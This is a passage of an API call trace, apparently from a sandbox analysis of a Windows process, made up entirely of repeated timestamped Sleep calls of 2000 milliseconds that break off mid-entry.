[0161.740] Sleep (dwMilliseconds=0x7d0) [0161.744] Sleep (dwMilliseconds=0x7d0) [0161.760] Sleep (dwMilliseconds=0x7d0) [0161.777] Sleep (dwMilliseconds=0x7d0) [0161.791] Sleep (dwMilliseconds=0x7d0) [0161.812] Sleep (dwMilliseconds=0x7d0) [0161.822] Sleep (dwMilliseconds=0x7d0) [0161.838] Sleep (dwMilliseconds=0x7d0) [0161.866] Sleep (dwMilliseconds=0x7d0) [0161.874] Sleep (dwMilliseconds=0x7d0) [0161.886] Sleep (dwMilliseconds=0x7d0) [0161.900] Sleep (dwMilliseconds=0x7d0) [0161.916] Sleep (dwMilliseconds=0x7d0) [0161.936] Sleep (dwMilliseconds=0x7d0) [0161.947] Sleep (dwMilliseconds=0x7d0) [0161.963] Sleep (dwMilliseconds=0x7d0) [0161.978] Sleep (dwMilliseconds=0x7d0) [0161.996] Sleep (dwMilliseconds=0x7d0) [0162.021] Sleep (dwMilliseconds=0x7d0) [0162.025] Sleep (dwMilliseconds=0x7d0) [0162.041] Sleep (dwMilliseconds=0x7d0) [0162.157] Sleep (dwMilliseconds=0x7d0) [0162.165] Sleep (dwMilliseconds=0x7d0) [0162.182] Sleep (dwMilliseconds=0x7d0) [0162.197] Sleep (dwMilliseconds=0x7d0) [0162.217] Sleep (dwMilliseconds=0x7d0) [0162.234] Sleep (dwMilliseconds=0x7d0) [0162.243] Sleep (dwMilliseconds=0x7d0) [0162.260] Sleep (dwMilliseconds=0x7d0) [0162.275] Sleep (dwMilliseconds=0x7d0) [0162.299] Sleep (dwMilliseconds=0x7d0) [0162.306] Sleep (dwMilliseconds=0x7d0) [0162.321] Sleep (dwMilliseconds=0x7d0) [0162.346] Sleep (dwMilliseconds=0x7d0) [0162.353] Sleep (dwMilliseconds=0x7d0) [0162.369] Sleep (dwMilliseconds=0x7d0) [0162.384] Sleep (dwMilliseconds=0x7d0) [0162.404] Sleep (dwMilliseconds=0x7d0) [0162.415] Sleep (dwMilliseconds=0x7d0) [0162.431] Sleep (dwMilliseconds=0x7d0) [0162.446] Sleep (dwMilliseconds=0x7d0) [0162.469] Sleep (dwMilliseconds=0x7d0) [0162.477] Sleep (dwMilliseconds=0x7d0) [0162.493] Sleep (dwMilliseconds=0x7d0) [0162.509] Sleep (dwMilliseconds=0x7d0) [0162.524] Sleep (dwMilliseconds=0x7d0) [0162.544] Sleep (dwMilliseconds=0x7d0) [0162.556] Sleep (dwMilliseconds=0x7d0) [0162.572] Sleep (dwMilliseconds=0x7d0) [0162.587] Sleep (dwMilliseconds=0x7d0) [0162.609] Sleep (dwMilliseconds=0x7d0) [0162.618] Sleep (dwMilliseconds=0x7d0) [0162.633] Sleep (dwMilliseconds=0x7d0) [0162.650] Sleep (dwMilliseconds=0x7d0) [0162.669] Sleep (dwMilliseconds=0x7d0) [0162.682] Sleep (dwMilliseconds=0x7d0) [0162.696] Sleep (dwMilliseconds=0x7d0) [0162.711] Sleep (dwMilliseconds=0x7d0) [0162.727] Sleep (dwMilliseconds=0x7d0) [0162.743] Sleep (dwMilliseconds=0x7d0) [0162.758] Sleep (dwMilliseconds=0x7d0) [0162.774] Sleep (dwMilliseconds=0x7d0) [0162.825] Sleep (dwMilliseconds=0x7d0) [0162.836] Sleep (dwMilliseconds=0x7d0) [0162.852] Sleep (dwMilliseconds=0x7d0) [0162.884] Sleep (dwMilliseconds=0x7d0) [0162.899] Sleep (dwMilliseconds=0x7d0) [0162.915] Sleep (dwMilliseconds=0x7d0) [0162.930] Sleep (dwMilliseconds=0x7d0) [0162.953] Sleep (dwMilliseconds=0x7d0) [0162.961] Sleep (dwMilliseconds=0x7d0) [0162.977] Sleep (dwMilliseconds=0x7d0) [0162.992] Sleep (dwMilliseconds=0x7d0) [0163.009] Sleep (dwMilliseconds=0x7d0) [0163.025] Sleep (dwMilliseconds=0x7d0) [0163.039] Sleep (dwMilliseconds=0x7d0) [0163.057] Sleep (dwMilliseconds=0x7d0) [0163.070] Sleep (dwMilliseconds=0x7d0) [0163.086] Sleep (dwMilliseconds=0x7d0) [0163.101] Sleep (dwMilliseconds=0x7d0) [0163.121] Sleep (dwMilliseconds=0x7d0) [0163.141] Sleep (dwMilliseconds=0x7d0) [0163.148] Sleep (dwMilliseconds=0x7d0) [0163.164] Sleep (dwMilliseconds=0x7d0) [0163.179] Sleep (dwMilliseconds=0x7d0) [0163.195] Sleep (dwMilliseconds=0x7d0) [0163.211] Sleep (dwMilliseconds=0x7d0) [0163.226] Sleep (dwMilliseconds=0x7d0) [0163.243] Sleep (dwMilliseconds=0x7d0) [0163.257] Sleep (dwMilliseconds=0x7d0) [0163.273] Sleep (dwMilliseconds=0x7d0) [0163.289] Sleep (dwMilliseconds=0x7d0) [0163.304] Sleep (dwMilliseconds=0x7d0) [0163.320] Sleep (dwMilliseconds=0x7d0) [0163.335] Sleep (dwMilliseconds=0x7d0) [0163.364] Sleep (dwMilliseconds=0x7d0) [0163.369] Sleep (dwMilliseconds=0x7d0) [0163.383] Sleep (dwMilliseconds=0x7d0) [0163.401] Sleep (dwMilliseconds=0x7d0) [0163.413] Sleep (dwMilliseconds=0x7d0) [0163.429] Sleep (dwMilliseconds=0x7d0) [0163.445] Sleep (dwMilliseconds=0x7d0) [0163.461] Sleep (dwMilliseconds=0x7d0) [0163.476] Sleep (dwMilliseconds=0x7d0) [0163.492] Sleep (dwMilliseconds=0x7d0) [0163.507] Sleep (dwMilliseconds=0x7d0) [0163.523] Sleep (dwMilliseconds=0x7d0) [0163.540] Sleep (dwMilliseconds=0x7d0) [0163.554] Sleep (dwMilliseconds=0x7d0) [0163.571] Sleep (dwMilliseconds=0x7d0) [0163.585] Sleep (dwMilliseconds=0x7d0) [0163.601] Sleep (dwMilliseconds=0x7d0) [0163.616] Sleep (dwMilliseconds=0x7d0) [0163.637] Sleep (dwMilliseconds=0x7d0) [0163.647] Sleep (dwMilliseconds=0x7d0) [0163.663] Sleep (dwMilliseconds=0x7d0) [0163.680] Sleep (dwMilliseconds=0x7d0) [0163.694] Sleep (dwMilliseconds=0x7d0) [0163.713] Sleep (dwMilliseconds=0x7d0) [0163.725] Sleep (dwMilliseconds=0x7d0) [0163.741] Sleep (dwMilliseconds=0x7d0) [0163.757] Sleep (dwMilliseconds=0x7d0) [0163.772] Sleep (dwMilliseconds=0x7d0) [0163.816] Sleep (dwMilliseconds=0x7d0) [0163.819] Sleep (dwMilliseconds=0x7d0) [0163.840] Sleep (dwMilliseconds=0x7d0) [0163.851] Sleep (dwMilliseconds=0x7d0) [0163.866] Sleep (dwMilliseconds=0x7d0) [0163.892] Sleep (dwMilliseconds=0x7d0) [0163.897] Sleep (dwMilliseconds=0x7d0) [0163.912] Sleep (dwMilliseconds=0x7d0) [0163.934] Sleep (dwMilliseconds=0x7d0) [0163.945] Sleep (dwMilliseconds=0x7d0) [0163.959] Sleep (dwMilliseconds=0x7d0) [0163.975] Sleep (dwMilliseconds=0x7d0) [0163.991] Sleep (dwMilliseconds=0x7d0) [0164.006] Sleep (dwMilliseconds=0x7d0) [0164.022] Sleep (dwMilliseconds=0x7d0) [0164.040] Sleep (dwMilliseconds=0x7d0) [0164.053] Sleep (dwMilliseconds=0x7d0) [0164.069] Sleep (dwMilliseconds=0x7d0) [0164.085] Sleep (dwMilliseconds=0x7d0) [0164.100] Sleep (dwMilliseconds=0x7d0) [0164.116] Sleep (dwMilliseconds=0x7d0) [0164.131] Sleep (dwMilliseconds=0x7d0) [0164.148] Sleep (dwMilliseconds=0x7d0) [0164.162] Sleep (dwMilliseconds=0x7d0) [0164.216] Sleep (dwMilliseconds=0x7d0) [0164.224] Sleep (dwMilliseconds=0x7d0) [0164.241] Sleep (dwMilliseconds=0x7d0) [0164.260] Sleep (dwMilliseconds=0x7d0) [0164.273] Sleep (dwMilliseconds=0x7d0) [0164.287] Sleep (dwMilliseconds=0x7d0) [0164.304] Sleep (dwMilliseconds=0x7d0) [0164.318] Sleep (dwMilliseconds=0x7d0) [0164.334] Sleep (dwMilliseconds=0x7d0) [0164.349] Sleep (dwMilliseconds=0x7d0) [0164.366] Sleep (dwMilliseconds=0x7d0) [0164.381] Sleep (dwMilliseconds=0x7d0) [0164.396] Sleep (dwMilliseconds=0x7d0) [0164.412] Sleep (dwMilliseconds=0x7d0) [0164.427] Sleep (dwMilliseconds=0x7d0) [0164.443] Sleep (dwMilliseconds=0x7d0) [0164.462] Sleep (dwMilliseconds=0x7d0) [0164.475] Sleep (dwMilliseconds=0x7d0) [0164.490] Sleep (dwMilliseconds=0x7d0) [0164.505] Sleep (dwMilliseconds=0x7d0) [0164.521] Sleep (dwMilliseconds=0x7d0) [0164.537] Sleep (dwMilliseconds=0x7d0) [0164.552] Sleep (dwMilliseconds=0x7d0) [0164.591] Sleep (dwMilliseconds=0x7d0) [0164.599] Sleep (dwMilliseconds=0x7d0) [0164.615] Sleep (dwMilliseconds=0x7d0) [0164.630] Sleep (dwMilliseconds=0x7d0) [0164.646] Sleep (dwMilliseconds=0x7d0) [0164.661] Sleep (dwMilliseconds=0x7d0) [0164.677] Sleep (dwMilliseconds=0x7d0) [0164.693] Sleep (dwMilliseconds=0x7d0) [0164.708] Sleep (dwMilliseconds=0x7d0) [0164.724] Sleep (dwMilliseconds=0x7d0) [0164.748] Sleep (dwMilliseconds=0x7d0) [0164.755] Sleep (dwMilliseconds=0x7d0) [0164.771] Sleep (dwMilliseconds=0x7d0) [0164.809] Sleep (dwMilliseconds=0x7d0) [0164.817] Sleep (dwMilliseconds=0x7d0) [0164.833] Sleep (dwMilliseconds=0x7d0) [0164.848] Sleep (dwMilliseconds=0x7d0) [0164.864] Sleep (dwMilliseconds=0x7d0) [0164.880] Sleep (dwMilliseconds=0x7d0) [0164.906] Sleep (dwMilliseconds=0x7d0) [0164.912] Sleep (dwMilliseconds=0x7d0) [0164.927] Sleep (dwMilliseconds=0x7d0) [0164.943] Sleep (dwMilliseconds=0x7d0) [0164.958] Sleep (dwMilliseconds=0x7d0) [0164.974] Sleep (dwMilliseconds=0x7d0) [0164.997] Sleep (dwMilliseconds=0x7d0) [0165.004] Sleep (dwMilliseconds=0x7d0) [0165.023] Sleep (dwMilliseconds=0x7d0) [0165.036] Sleep (dwMilliseconds=0x7d0) [0165.052] Sleep (dwMilliseconds=0x7d0) [0165.067] Sleep (dwMilliseconds=0x7d0) [0165.083] Sleep (dwMilliseconds=0x7d0) [0165.098] Sleep (dwMilliseconds=0x7d0) [0165.114] Sleep (dwMilliseconds=0x7d0) [0165.130] Sleep (dwMilliseconds=0x7d0) [0165.145] Sleep (dwMilliseconds=0x7d0) [0165.161] Sleep (dwMilliseconds=0x7d0) [0165.176] Sleep (dwMilliseconds=0x7d0) [0165.192] Sleep (dwMilliseconds=0x7d0) [0165.207] Sleep (dwMilliseconds=0x7d0) [0165.223] Sleep (dwMilliseconds=0x7d0) [0165.240] Sleep (dwMilliseconds=0x7d0) [0165.254] Sleep (dwMilliseconds=0x7d0) [0165.270] Sleep (dwMilliseconds=0x7d0) [0165.288] Sleep (dwMilliseconds=0x7d0) [0165.301] Sleep (dwMilliseconds=0x7d0) [0165.317] Sleep (dwMilliseconds=0x7d0) [0165.332] Sleep (dwMilliseconds=0x7d0) [0165.349] Sleep (dwMilliseconds=0x7d0) [0165.364] Sleep (dwMilliseconds=0x7d0) [0165.379] Sleep (dwMilliseconds=0x7d0) [0165.395] Sleep (dwMilliseconds=0x7d0) [0165.410] Sleep (dwMilliseconds=0x7d0) [0165.426] Sleep (dwMilliseconds=0x7d0) [0165.441] Sleep (dwMilliseconds=0x7d0) [0165.459] Sleep (dwMilliseconds=0x7d0) [0165.473] Sleep (dwMilliseconds=0x7d0) [0165.488] Sleep (dwMilliseconds=0x7d0) [0165.504] Sleep (dwMilliseconds=0x7d0) [0165.525] Sleep (dwMilliseconds=0x7d0) [0165.535] Sleep (dwMilliseconds=0x7d0) [0165.551] Sleep (dwMilliseconds=0x7d0) [0165.567] Sleep (dwMilliseconds=0x7d0) [0165.582] Sleep (dwMilliseconds=0x7d0) [0165.597] Sleep (dwMilliseconds=0x7d0) [0165.676] Sleep (dwMilliseconds=0x7d0) [0165.691] Sleep (dwMilliseconds=0x7d0) [0165.707] Sleep (dwMilliseconds=0x7d0) [0165.722] Sleep (dwMilliseconds=0x7d0) [0165.738] Sleep (dwMilliseconds=0x7d0) [0165.765] Sleep (dwMilliseconds=0x7d0) [0165.769] Sleep (dwMilliseconds=0x7d0) [0165.786] Sleep (dwMilliseconds=0x7d0) [0165.803] Sleep (dwMilliseconds=0x7d0) [0165.816] Sleep (dwMilliseconds=0x7d0) [0165.854] Sleep (dwMilliseconds=0x7d0) [0165.863] Sleep (dwMilliseconds=0x7d0) [0165.878] Sleep (dwMilliseconds=0x7d0) [0165.895] Sleep (dwMilliseconds=0x7d0) [0165.909] Sleep (dwMilliseconds=0x7d0) [0165.925] Sleep (dwMilliseconds=0x7d0) [0165.941] Sleep (dwMilliseconds=0x7d0) [0165.956] Sleep (dwMilliseconds=0x7d0) [0165.972] Sleep (dwMilliseconds=0x7d0) [0165.987] Sleep (dwMilliseconds=0x7d0) [0166.005] Sleep (dwMilliseconds=0x7d0) [0166.019] Sleep (dwMilliseconds=0x7d0) [0166.034] Sleep (dwMilliseconds=0x7d0) [0166.050] Sleep (dwMilliseconds=0x7d0) [0166.066] Sleep (dwMilliseconds=0x7d0) [0166.081] Sleep (dwMilliseconds=0x7d0) [0166.102] Sleep (dwMilliseconds=0x7d0) [0166.114] Sleep (dwMilliseconds=0x7d0) [0166.128] Sleep (dwMilliseconds=0x7d0) [0166.143] Sleep (dwMilliseconds=0x7d0) [0166.159] Sleep (dwMilliseconds=0x7d0) [0166.175] Sleep (dwMilliseconds=0x7d0) [0166.190] Sleep (dwMilliseconds=0x7d0) [0166.206] Sleep (dwMilliseconds=0x7d0) [0166.222] Sleep (dwMilliseconds=0x7d0) [0166.237] Sleep (dwMilliseconds=0x7d0) [0166.253] Sleep (dwMilliseconds=0x7d0) [0166.268] Sleep (dwMilliseconds=0x7d0) [0166.284] Sleep (dwMilliseconds=0x7d0) [0166.299] Sleep (dwMilliseconds=0x7d0) [0166.315] Sleep (dwMilliseconds=0x7d0) [0166.332] Sleep (dwMilliseconds=0x7d0) [0166.346] Sleep (dwMilliseconds=0x7d0) [0166.362] Sleep (dwMilliseconds=0x7d0) [0166.377] Sleep (dwMilliseconds=0x7d0) [0166.393] Sleep (dwMilliseconds=0x7d0) [0166.411] Sleep (dwMilliseconds=0x7d0) [0166.424] Sleep (dwMilliseconds=0x7d0) [0166.442] Sleep (dwMilliseconds=0x7d0) [0166.455] Sleep (dwMilliseconds=0x7d0) [0166.471] Sleep (dwMilliseconds=0x7d0) [0166.487] Sleep (dwMilliseconds=0x7d0) [0166.502] Sleep (dwMilliseconds=0x7d0) [0166.518] Sleep (dwMilliseconds=0x7d0) [0166.537] Sleep (dwMilliseconds=0x7d0) [0166.550] Sleep (dwMilliseconds=0x7d0) [0166.565] Sleep (dwMilliseconds=0x7d0) [0166.580] Sleep (dwMilliseconds=0x7d0) [0166.596] Sleep (dwMilliseconds=0x7d0) [0166.611] Sleep (dwMilliseconds=0x7d0) [0166.632] Sleep (dwMilliseconds=0x7d0) [0166.643] Sleep (dwMilliseconds=0x7d0) [0166.659] Sleep (dwMilliseconds=0x7d0) [0166.674] Sleep (dwMilliseconds=0x7d0) [0166.689] Sleep (dwMilliseconds=0x7d0) [0166.705] Sleep (dwMilliseconds=0x7d0) [0166.722] Sleep (dwMilliseconds=0x7d0) [0166.736] Sleep (dwMilliseconds=0x7d0) [0166.752] Sleep (dwMilliseconds=0x7d0) [0166.776] Sleep (dwMilliseconds=0x7d0) [0166.783] Sleep (dwMilliseconds=0x7d0) [0166.799] Sleep (dwMilliseconds=0x7d0) [0166.814] Sleep (dwMilliseconds=0x7d0) [0166.850] Sleep (dwMilliseconds=0x7d0) [0166.861] Sleep (dwMilliseconds=0x7d0) [0166.878] Sleep (dwMilliseconds=0x7d0) [0166.892] Sleep (dwMilliseconds=0x7d0) [0166.932] Sleep (dwMilliseconds=0x7d0) [0166.939] Sleep (dwMilliseconds=0x7d0) [0166.955] Sleep (dwMilliseconds=0x7d0) [0166.970] Sleep (dwMilliseconds=0x7d0) [0166.987] Sleep (dwMilliseconds=0x7d0) [0167.001] Sleep (dwMilliseconds=0x7d0) [0167.017] Sleep (dwMilliseconds=0x7d0) [0167.033] Sleep (dwMilliseconds=0x7d0) [0167.048] Sleep (dwMilliseconds=0x7d0) [0167.064] Sleep (dwMilliseconds=0x7d0) [0167.079] Sleep (dwMilliseconds=0x7d0) [0167.096] Sleep (dwMilliseconds=0x7d0) [0167.111] Sleep (dwMilliseconds=0x7d0) [0167.127] Sleep (dwMilliseconds=0x7d0) [0167.142] Sleep (dwMilliseconds=0x7d0) [0167.157] Sleep (dwMilliseconds=0x7d0) [0167.178] Sleep (dwMilliseconds=0x7d0) [0167.189] Sleep (dwMilliseconds=0x7d0) [0167.206] Sleep (dwMilliseconds=0x7d0) [0167.220] Sleep (dwMilliseconds=0x7d0) [0167.238] Sleep (dwMilliseconds=0x7d0) [0167.251] Sleep (dwMilliseconds=0x7d0) [0167.266] Sleep (dwMilliseconds=0x7d0) [0167.282] Sleep (dwMilliseconds=0x7d0) [0167.298] Sleep (dwMilliseconds=0x7d0) [0167.315] Sleep (dwMilliseconds=0x7d0) [0167.329] Sleep (dwMilliseconds=0x7d0) [0167.345] Sleep (dwMilliseconds=0x7d0) [0167.362] Sleep (dwMilliseconds=0x7d0) [0167.376] Sleep (dwMilliseconds=0x7d0) [0167.392] Sleep (dwMilliseconds=0x7d0) [0167.407] Sleep (dwMilliseconds=0x7d0) [0167.425] Sleep (dwMilliseconds=0x7d0) [0167.438] Sleep (dwMilliseconds=0x7d0) [0167.454] Sleep (dwMilliseconds=0x7d0) [0167.469] Sleep (dwMilliseconds=0x7d0) [0167.485] Sleep (dwMilliseconds=0x7d0) [0167.501] Sleep (dwMilliseconds=0x7d0) [0167.516] Sleep (dwMilliseconds=0x7d0) [0167.533] Sleep (dwMilliseconds=0x7d0) [0167.548] Sleep (dwMilliseconds=0x7d0) [0167.563] Sleep (dwMilliseconds=0x7d0) [0167.579] Sleep (dwMilliseconds=0x7d0) [0167.594] Sleep (dwMilliseconds=0x7d0) [0167.612] Sleep (dwMilliseconds=0x7d0) [0167.625] Sleep (dwMilliseconds=0x7d0) [0167.643] Sleep (dwMilliseconds=0x7d0) [0167.656] Sleep (dwMilliseconds=0x7d0) [0167.672] Sleep (dwMilliseconds=0x7d0) [0167.688] Sleep (dwMilliseconds=0x7d0) [0167.712] Sleep (dwMilliseconds=0x7d0) [0167.719] Sleep (dwMilliseconds=0x7d0) [0167.735] Sleep (dwMilliseconds=0x7d0) [0167.752] Sleep (dwMilliseconds=0x7d0) [0167.766] Sleep (dwMilliseconds=0x7d0) [0167.781] Sleep (dwMilliseconds=0x7d0) [0167.797] Sleep (dwMilliseconds=0x7d0) [0167.813] Sleep (dwMilliseconds=0x7d0) [0167.828] Sleep (dwMilliseconds=0x7d0) [0167.866] Sleep (dwMilliseconds=0x7d0) [0167.875] Sleep (dwMilliseconds=0x7d0) [0167.891] Sleep (dwMilliseconds=0x7d0) [0167.907] Sleep (dwMilliseconds=0x7d0) [0167.932] Sleep (dwMilliseconds=0x7d0) [0167.938] Sleep (dwMilliseconds=0x7d0) [0167.953] Sleep (dwMilliseconds=0x7d0) [0167.970] Sleep (dwMilliseconds=0x7d0) [0167.984] Sleep (dwMilliseconds=0x7d0) [0168.000] Sleep (dwMilliseconds=0x7d0) [0168.015] Sleep (dwMilliseconds=0x7d0) [0168.031] Sleep (dwMilliseconds=0x7d0) [0168.047] Sleep (dwMilliseconds=0x7d0) [0168.062] Sleep (dwMilliseconds=0x7d0) [0168.081] Sleep (dwMilliseconds=0x7d0) [0168.093] Sleep (dwMilliseconds=0x7d0) [0168.109] Sleep (dwMilliseconds=0x7d0) [0168.125] Sleep (dwMilliseconds=0x7d0) [0168.141] Sleep (dwMilliseconds=0x7d0) [0168.156] Sleep (dwMilliseconds=0x7d0) [0168.172] Sleep (dwMilliseconds=0x7d0) [0168.192] Sleep (dwMilliseconds=0x7d0) [0168.203] Sleep (dwMilliseconds=0x7d0) [0168.218] Sleep (dwMilliseconds=0x7d0) [0168.241] Sleep (dwMilliseconds=0x7d0) [0168.249] Sleep (dwMilliseconds=0x7d0) [0168.265] Sleep (dwMilliseconds=0x7d0) [0168.281] Sleep (dwMilliseconds=0x7d0) [0168.298] Sleep (dwMilliseconds=0x7d0) [0168.312] Sleep (dwMilliseconds=0x7d0) [0168.328] Sleep (dwMilliseconds=0x7d0) [0168.343] Sleep (dwMilliseconds=0x7d0) [0168.359] Sleep (dwMilliseconds=0x7d0) [0168.374] Sleep (dwMilliseconds=0x7d0) [0168.391] Sleep (dwMilliseconds=0x7d0) [0168.407] Sleep (dwMilliseconds=0x7d0) [0168.421] Sleep (dwMilliseconds=0x7d0) [0168.445] Sleep (dwMilliseconds=0x7d0) [0168.452] Sleep (dwMilliseconds=0x7d0) [0168.468] Sleep (dwMilliseconds=0x7d0) [0168.483] Sleep (dwMilliseconds=0x7d0) [0168.499] Sleep (dwMilliseconds=0x7d0) [0168.516] Sleep (dwMilliseconds=0x7d0) [0168.530] Sleep (dwMilliseconds=0x7d0) [0168.546] Sleep (dwMilliseconds=0x7d0) [0168.561] Sleep (dwMilliseconds=0x7d0) [0168.577] Sleep (dwMilliseconds=0x7d0) [0168.592] Sleep (dwMilliseconds=0x7d0) [0168.608] Sleep (dwMilliseconds=0x7d0) [0168.625] Sleep (dwMilliseconds=0x7d0) [0168.640] Sleep (dwMilliseconds=0x7d0) [0168.655] Sleep (dwMilliseconds=0x7d0) [0168.671] Sleep (dwMilliseconds=0x7d0) [0168.686] Sleep (dwMilliseconds=0x7d0) [0168.702] Sleep (dwMilliseconds=0x7d0) [0168.718] Sleep (dwMilliseconds=0x7d0) [0168.734] Sleep (dwMilliseconds=0x7d0) [0168.749] Sleep (dwMilliseconds=0x7d0) [0168.774] Sleep (dwMilliseconds=0x7d0) [0168.793] Sleep (dwMilliseconds=0x7d0) [0168.795] Sleep (dwMilliseconds=0x7d0) [0168.811] Sleep (dwMilliseconds=0x7d0) [0168.827] Sleep (dwMilliseconds=0x7d0) [0168.862] Sleep (dwMilliseconds=0x7d0) [0168.873] Sleep (dwMilliseconds=0x7d0) [0168.889] Sleep (dwMilliseconds=0x7d0) [0168.905] Sleep (dwMilliseconds=0x7d0) [0168.920] Sleep (dwMilliseconds=0x7d0) [0168.951] Sleep (dwMilliseconds=0x7d0) [0168.951] Sleep (dwMilliseconds=0x7d0) [0168.968] Sleep (dwMilliseconds=0x7d0) [0168.983] Sleep (dwMilliseconds=0x7d0) [0168.998] Sleep (dwMilliseconds=0x7d0) [0169.014] Sleep (dwMilliseconds=0x7d0) [0169.029] Sleep (dwMilliseconds=0x7d0) [0169.045] Sleep (dwMilliseconds=0x7d0) [0169.061] Sleep (dwMilliseconds=0x7d0) [0169.078] Sleep (dwMilliseconds=0x7d0) [0169.092] Sleep (dwMilliseconds=0x7d0) [0169.108] Sleep (dwMilliseconds=0x7d0) [0169.124] Sleep (dwMilliseconds=0x7d0) [0169.139] Sleep (dwMilliseconds=0x7d0) [0169.154] Sleep (dwMilliseconds=0x7d0) [0169.170] Sleep (dwMilliseconds=0x7d0) [0169.187] Sleep (dwMilliseconds=0x7d0) [0169.201] Sleep (dwMilliseconds=0x7d0) [0169.217] Sleep (dwMilliseconds=0x7d0) [0169.232] Sleep (dwMilliseconds=0x7d0) [0169.248] Sleep (dwMilliseconds=0x7d0) [0169.310] Sleep (dwMilliseconds=0x7d0) [0169.335] Sleep (dwMilliseconds=0x7d0) [0169.341] Sleep (dwMilliseconds=0x7d0) [0169.357] Sleep (dwMilliseconds=0x7d0) [0169.373] Sleep (dwMilliseconds=0x7d0) [0169.388] Sleep (dwMilliseconds=0x7d0) [0169.408] Sleep (dwMilliseconds=0x7d0) [0169.420] Sleep (dwMilliseconds=0x7d0) [0169.435] Sleep (dwMilliseconds=0x7d0) [0169.451] Sleep (dwMilliseconds=0x7d0) [0169.466] Sleep (dwMilliseconds=0x7d0) [0169.482] Sleep (dwMilliseconds=0x7d0) [0169.498] Sleep (dwMilliseconds=0x7d0) [0169.514] Sleep (dwMilliseconds=0x7d0) [0169.529] Sleep (dwMilliseconds=0x7d0) [0169.544] Sleep (dwMilliseconds=0x7d0) [0169.698] Sleep (dwMilliseconds=0x7d0) [0169.700] Sleep (dwMilliseconds=0x7d0) [0169.716] Sleep (dwMilliseconds=0x7d0) [0169.732] Sleep (dwMilliseconds=0x7d0) [0169.748] Sleep (dwMilliseconds=0x7d0) [0169.763] Sleep (dwMilliseconds=0x7d0) [0169.778] Sleep (dwMilliseconds=0x7d0) [0169.794] Sleep (dwMilliseconds=0x7d0) [0169.810] Sleep (dwMilliseconds=0x7d0) [0169.825] Sleep (dwMilliseconds=0x7d0) [0169.841] Sleep (dwMilliseconds=0x7d0) [0169.982] Sleep (dwMilliseconds=0x7d0) [0169.997] Sleep (dwMilliseconds=0x7d0) [0170.012] Sleep (dwMilliseconds=0x7d0) [0170.033] Sleep (dwMilliseconds=0x7d0) [0170.060] Sleep (dwMilliseconds=0x7d0) [0170.075] Sleep (dwMilliseconds=0x7d0) [0170.091] Sleep (dwMilliseconds=0x7d0) [0170.106] Sleep (dwMilliseconds=0x7d0) [0170.122] Sleep (dwMilliseconds=0x7d0) [0170.137] Sleep (dwMilliseconds=0x7d0) [0170.153] Sleep (dwMilliseconds=0x7d0) [0170.168] Sleep (dwMilliseconds=0x7d0) [0170.184] Sleep (dwMilliseconds=0x7d0) [0170.201] Sleep (dwMilliseconds=0x7d0) [0170.215] Sleep (dwMilliseconds=0x7d0) [0170.231] Sleep (dwMilliseconds=0x7d0) [0170.246] Sleep (dwMilliseconds=0x7d0) [0170.268] Sleep (dwMilliseconds=0x7d0) [0170.278] Sleep (dwMilliseconds=0x7d0) [0170.293] Sleep (dwMilliseconds=0x7d0) [0170.310] Sleep (dwMilliseconds=0x7d0) [0170.325] Sleep (dwMilliseconds=0x7d0) [0170.340] Sleep (dwMilliseconds=0x7d0) [0170.357] Sleep (dwMilliseconds=0x7d0) [0170.371] Sleep (dwMilliseconds=0x7d0) [0170.387] Sleep (dwMilliseconds=0x7d0) [0170.403] Sleep (dwMilliseconds=0x7d0) [0170.419] Sleep (dwMilliseconds=0x7d0) [0170.434] Sleep (dwMilliseconds=0x7d0) [0170.449] Sleep (dwMilliseconds=0x7d0) [0170.465] Sleep (dwMilliseconds=0x7d0) [0170.480] Sleep (dwMilliseconds=0x7d0) [0170.496] Sleep (dwMilliseconds=0x7d0) [0170.512] Sleep (dwMilliseconds=0x7d0) [0170.528] Sleep (dwMilliseconds=0x7d0) [0170.543] Sleep (dwMilliseconds=0x7d0) [0170.562] Sleep (dwMilliseconds=0x7d0) [0170.613] Sleep (dwMilliseconds=0x7d0) [0170.621] Sleep (dwMilliseconds=0x7d0) [0170.638] Sleep (dwMilliseconds=0x7d0) [0170.652] Sleep (dwMilliseconds=0x7d0) [0170.668] Sleep (dwMilliseconds=0x7d0) [0170.683] Sleep (dwMilliseconds=0x7d0) [0170.699] Sleep (dwMilliseconds=0x7d0) [0170.714] Sleep (dwMilliseconds=0x7d0) [0170.730] Sleep (dwMilliseconds=0x7d0) [0170.747] Sleep (dwMilliseconds=0x7d0) [0170.761] Sleep (dwMilliseconds=0x7d0) [0170.777] Sleep (dwMilliseconds=0x7d0) [0170.794] Sleep (dwMilliseconds=0x7d0) [0170.815] Sleep (dwMilliseconds=0x7d0) [0170.823] Sleep (dwMilliseconds=0x7d0) [0170.839] Sleep (dwMilliseconds=0x7d0) [0170.856] Sleep (dwMilliseconds=0x7d0) [0170.910] Sleep (dwMilliseconds=0x7d0) [0170.917] Sleep (dwMilliseconds=0x7d0) [0170.933] Sleep (dwMilliseconds=0x7d0) [0170.948] Sleep (dwMilliseconds=0x7d0) [0170.965] Sleep (dwMilliseconds=0x7d0) [0170.990] Sleep (dwMilliseconds=0x7d0) [0170.995] Sleep (dwMilliseconds=0x7d0) [0171.011] Sleep (dwMilliseconds=0x7d0) [0171.026] Sleep (dwMilliseconds=0x7d0) [0171.062] Sleep (dwMilliseconds=0x7d0) [0171.075] Sleep (dwMilliseconds=0x7d0) [0171.089] Sleep (dwMilliseconds=0x7d0) [0171.118] Sleep (dwMilliseconds=0x7d0) [0171.120] Sleep (dwMilliseconds=0x7d0) [0171.135] Sleep (dwMilliseconds=0x7d0) [0171.156] Sleep (dwMilliseconds=0x7d0) [0171.167] Sleep (dwMilliseconds=0x7d0) [0171.185] Sleep (dwMilliseconds=0x7d0) [0171.198] Sleep (dwMilliseconds=0x7d0) [0171.213] Sleep (dwMilliseconds=0x7d0) [0171.229] Sleep (dwMilliseconds=0x7d0) [0171.245] Sleep (dwMilliseconds=0x7d0) [0171.260] Sleep (dwMilliseconds=0x7d0) [0171.276] Sleep (dwMilliseconds=0x7d0) [0171.295] Sleep (dwMilliseconds=0x7d0) [0171.308] Sleep (dwMilliseconds=0x7d0) [0171.323] Sleep (dwMilliseconds=0x7d0) [0171.338] Sleep (dwMilliseconds=0x7d0) [0171.354] Sleep (dwMilliseconds=0x7d0) [0171.370] Sleep (dwMilliseconds=0x7d0) [0171.386] Sleep (dwMilliseconds=0x7d0) [0171.402] Sleep (dwMilliseconds=0x7d0) [0171.416] Sleep (dwMilliseconds=0x7d0) [0171.432] Sleep (dwMilliseconds=0x7d0) [0171.448] Sleep (dwMilliseconds=0x7d0) [0171.463] Sleep 